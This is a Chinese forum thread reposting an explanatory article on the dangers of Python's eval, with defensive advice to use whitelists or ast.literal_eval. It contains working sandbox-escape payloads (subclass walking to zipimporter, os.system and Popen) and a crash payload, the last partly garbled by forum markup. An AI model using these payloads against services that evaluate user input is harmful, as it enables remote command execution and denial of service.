请选择 进入手机版 | 继续访问电脑版
楼主: 安然2016
1662 2

[软件应用] Python中eval带来的潜在风险 [推广有奖]

  • 0关注
  • 13粉丝

讲师

7%

还不是VIP/贵宾

-

威望
0
论坛币
50136 个
通用积分
1.0002
学术水平
4 点
热心指数
12 点
信用等级
5 点
经验
5550 点
帖子
252
精华
0
在线时间
111 小时
注册时间
2016-2-16
最后登录
2017-5-25

安然2016 发表于 2016-2-16 16:28:12 |显示全部楼层 |坛友微信交流群

+2 论坛币
k人 参与回答

经管之家送您一份

应届毕业生专属福利!

求职就业群
赵安豆老师微信:zhaoandou666

经管之家联合CDA

送您一个全额奖学金名额~ !

感谢您参与论坛问题回答

经管之家送您两个论坛币!

+2 论坛币
从内容我们可以看出,单单将内置模块置为空,是不够的,最好的机制是构造白名单,如果觉得比较麻烦,可以使用ast.literal_eval代替不安全的eval。

0x00 前言


eval是Python用于执行python表达式的一个内置函数,使用eval,可以很方便的将字符串动态执行。比如下列代码:

1

2

3

4

>>> eval("1+2")

3

>>> eval("[x for x in range(10)]")

[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]




当内存中的内置模块含有os的话,eval同样可以做到命令执行:

1

2

3

4

>>> import os

>>> eval("os.system('whoami')")

win-20140812chj\administrator

0




当然,eval只能执行Python的表达式类型的代码,不能直接用它进行import操作,但exec可以。如果非要使用eval进行import,则使用__import__:

1

2

3

4

5

6

7

8

9

10

11

>>> exec('import os')

>>> eval('import os')

Traceback (most recent call last):

  File "<stdin>", line 1, in <module>

  File "<string>", line 1

    import os

         ^

SyntaxError: invalid syntax

>>> eval("__import__('os').system('whoami')")

win-20140812chj\administrator

0




在实际的代码中,往往有使用客户端数据带入eval中执行的需求。比如动态模块的引入,举个栗子,一个在线爬虫平台上爬虫可能有多个并且位于不同的 模块中,服务器端但往往只需要调用用户在客户端选择的爬虫类型,并通过后端的exec或者eval进行动态调用,后端编码实现非常方便。但如果对用户的请 求处理不恰当,就会造成严重的安全漏洞。

0x01 “安全”使用eval


现在提倡最多的就是使用eval的后两个参数来设置函数的白名单:

Eval函数的声明为eval(expression[, globals[, locals]])

其中,第二三个参数分别指定能够在eval中使用的函数等,如果不指定,默认为globals()和locals()函数中 包含的模块和函数。

1

2

3

4

5

6

7

8

9

10

11

>>> import os

>>> 'os' in globals()

True

>>> eval('os.system(\'whoami\')')

win-20140812chj\administrator

0

>>> eval('os.system(\'whoami\')',{},{})

Traceback (most recent call last):

  File "<stdin>", line 1, in <module>

  File "<string>", line 1, in <module>

NameError: name 'os' is not defined




如果指定只允许调用abs函数,可以使用下面的写法:

1

2

3

4

5

6

7

8

9

10

>>> eval('abs(-20)',{'abs':abs},{'abs':abs})

20

>>> eval('os.system(\'whoami\')',{'abs':abs},{'abs':abs})

Traceback (most recent call last):

  File "<stdin>", line 1, in <module>

  File "<string>", line 1, in <module>

NameError: name 'os' is not defined

>>> eval('os.system(\'whoami\')')

win-20140812chj\administrator

0




使用这种方法来防护,确实可以起到一定的作用,但是,这种处理方法可能会被绕过,从而造成其他问题!


文|隐形人真忙


http://cos.name/2015/11/to-achieve-the-visualization-and-annotation-of-evolutionary-tree-using-ggtree/




二维码

扫码加我 拉你入群

请注明:姓名-公司-职位

以便审核进群资格,未注明则拒绝

关键词:python eval 潜在风险 EVA Evolutionary package 密码 统计 信息

安然2016 发表于 2016-2-17 13:06:13 |显示全部楼层 |坛友微信交流群

0x02 绕过执行代码1


被绕过的情景如下,小明知道了eval会带来一定的安全风险,所以使用如下的手段去防止eval执行任意代码:

1

2

3

4

5

6

7

8

env = {}

env["locals"]   = None

env["globals"]  = None

env["__name__"] = None

env["__file__"] = None

env["__builtins__"] = None


eval(users_str, env)




Python中的__builtins__是内置模块,用来设置内置函数的模块。比如熟悉的abs,open等内置函数,都是在该模块中以字典的方式存储的,下面两种写法是等价的:

1

2

3

4

>>> __builtins__.abs(-20)

20

>>> abs(-20)

20




我们也可以自定义内置函数,并像使用Python中的内置函数一样使用它们:

1

2

3

4

5

>>> def hello():

...     print 'shabi'

>>> __builtin__.__dict__['say_hello'] = hello

>>> say_hello()

shabi




小明将eval函数的作用域中的内置模块设置为None,好像看起来很彻底了,但依然可以被绕过。__builtins__是__builtin__的一个引用,在__main__模块下,两者是等价的:

1

2

3

4

>>> id(__builtins__)

3549136

>>> id(__builtin__)

3549136




根据乌云drops提到的方法,使用如下代码即可:

1

[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ =="zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")




上面的代码首先利用__class__和__subclasses__动态加载了object对 象,这是因为eval中无法直接使用object。然后使用object的子类的zipimporter对egg压缩文件中的configobj模块进行 导入,并调用其内置模块中的os模块从而实现命令执行,当然,前提是要有configobj的egg文件。 configobj模块很有意思,居然内置了os模块:

1

2

3

4

5

6

7

8

9

10

11

>>> "os" in configobj.__dict__

True

>>> import urllib

>>> "os" in urllib.__dict__

True

>>> import urllib2

>>> "os" in urllib2.__dict__

True

>>> configobj.os.system("whoami")

win-20140812chj\administrator

0




和configobj类似的模块如urllib,urllib2,setuptools等都有os的内置,理论上使用哪个都行。 如果无法下载egg压缩文件,可以下载带有setup.py的文件夹,加入:

1

from setuptools import setup, find_packages




然后执行:

1

python setup.py bdist_egg




就可以在dist文件夹中找到对应的egg文件。 绕过demo如下:

1

2

3

4

5

6

7

8

9

10

11

12

13

>>> env = {}

>>> env["locals"]   = None

>>> env["globals"]  = None

>>> env["__name__"] = None

>>> env["__file__"] = None

>>> env["__builtins__"] = None

>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"

>>> eval(users_str, env)

win-20140812chj\administrator

0

>>> eval(users_str, {}, {})

win-20140812chj\administrator

0




0x03 拒绝服务攻击1


object的子类中有很多有趣的东西,执行以下代码查看:

1

[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]




这里我就不输出结果了,如果你执行的话,可以看到很多有趣的模块,比如file,zipimporter,Quitter等。经过测试,file的构造函数是被解释器沙箱隔离的。 简单的,或者直接使object暴露出的子类Quitter进行退出:

1

2

3

4

>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() ifx.__name__

== 'Quitter'][0](0)()", {'__builtins__':None})


C:/>




如果运气好,遇到对方程序中导入了os等敏感模块,那么Popen就可以用,并且绕过__builins__为空的限制,栗子如下:

1

2

3

4

5

6

7

8

9

10

11

>>> import subprocess

>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})

<subprocess.Popen object at 0x0324FF70>

>>>

正在 Ping 127.0.0.1 具有 32 字节的数据:

来自 127.0.0.1 的回复: 字节=32 时间<1ms TTL=64

127.0.0.1 的 Ping 统计信息:

    数据包: 已发送 = 1,已接收 = 1,丢失 = 0 (0% 丢失),

往返行程的估计时间(以毫秒为单位):

    最短 = 0ms,最长 = 0ms,平均 = 0ms

>>>



使用道具

安然2016 发表于 2016-2-17 13:10:39 |显示全部楼层 |坛友微信交流群
事实上,这种情况非常多,比如导入os模块,一般用来处理路径问题。所以说,遇到这种情况,完全可以列举大量的功能函数,来探测目标object的子类中是否含有一些危险的函数可以直接使用。

0x04 拒绝服务攻击2

同样,我们甚至可以绕过__builtins__为None,造成一次拒绝服务攻击,Payload(来自老外blog)如下:

1

>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})

运行上面的代码,Python直接crash掉了,造成拒绝服务攻击。 原理是通过嵌套的lambda来构造一片代码段,即code对象。为这个code对象分配空的栈,并给出相应的代码字符串,这里是KABOOM,在空栈上执行代码,会出现crash。构造完成后,调用fc函数即可触发,其思路不可谓不**。

0x05 总结

从上面的内容我们可以看出,单单将内置模块置为空,是不够的,最好的机制是构造白名单,如果觉得比较麻烦,可以使用ast.literal_eval代替不安全的eval。

参考资料:

【1】http://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html

【2】http://drops.wooyun.org/web/7490

【3】http://stackoverflow.com/questions/3513292/python-make-eval-safe

使用道具

您需要登录后才可以回帖 登录 | 我要注册

本版微信群
加好友,备注cda
拉您进交流群

京ICP备16021002-2号 京B2-20170662号 京公网安备 11010802022788号 论坛法律顾问:王进律师 知识产权保护声明   免责及隐私声明

GMT+8, 2024-3-29 23:02